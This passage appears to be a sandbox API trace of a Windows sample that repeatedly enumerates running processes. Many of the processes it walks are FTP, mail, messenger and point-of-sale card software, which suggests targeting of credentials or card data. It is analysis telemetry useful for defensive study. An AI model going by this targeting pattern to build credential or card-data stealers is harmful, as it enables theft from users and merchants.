lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0097.443] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0097.444] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0097.445] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0097.447] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0097.448] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0097.449] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0097.450] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0097.452] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0097.453] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0097.454] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0097.456] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0097.457] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0097.458] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0097.459] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0097.463] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0097.464] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0097.466] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0097.467] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0097.469] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0097.471] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0097.472] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0097.474] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0097.476] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0097.477] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0097.479] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0097.481] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0097.483] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0097.484] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0097.486] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0097.487] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0097.489] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0097.491] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0097.494] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0097.495] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0097.497] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0097.498] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0097.500] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0097.502] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0097.503] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0097.505] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0097.506] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0097.512] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0097.514] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0097.515] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0097.517] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0097.518] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0097.520] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0097.521] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0097.523] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0097.525] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0097.526] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0097.528] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0097.529] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0097.531] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0097.532] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0097.534] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0097.535] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0097.536] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x360, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0097.542] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x360, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0097.543] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0097.545] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0097.546] Process32Next (in: hSnapshot=0x1670, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0097.547] CloseHandle (hObject=0x1670) returned 1 [0097.547] Sleep (dwMilliseconds=0x64) [0097.665] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b8c [0097.675] Process32First (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0097.677] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x75, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0097.679] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0097.681] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.682] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0097.683] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0097.685] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0097.687] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0097.688] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0097.690] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.692] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.693] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0097.696] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.697] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.698] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.700] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.701] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.702] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.704] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0097.706] Process32Next (in: hSnapshot=0x1b8c, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, 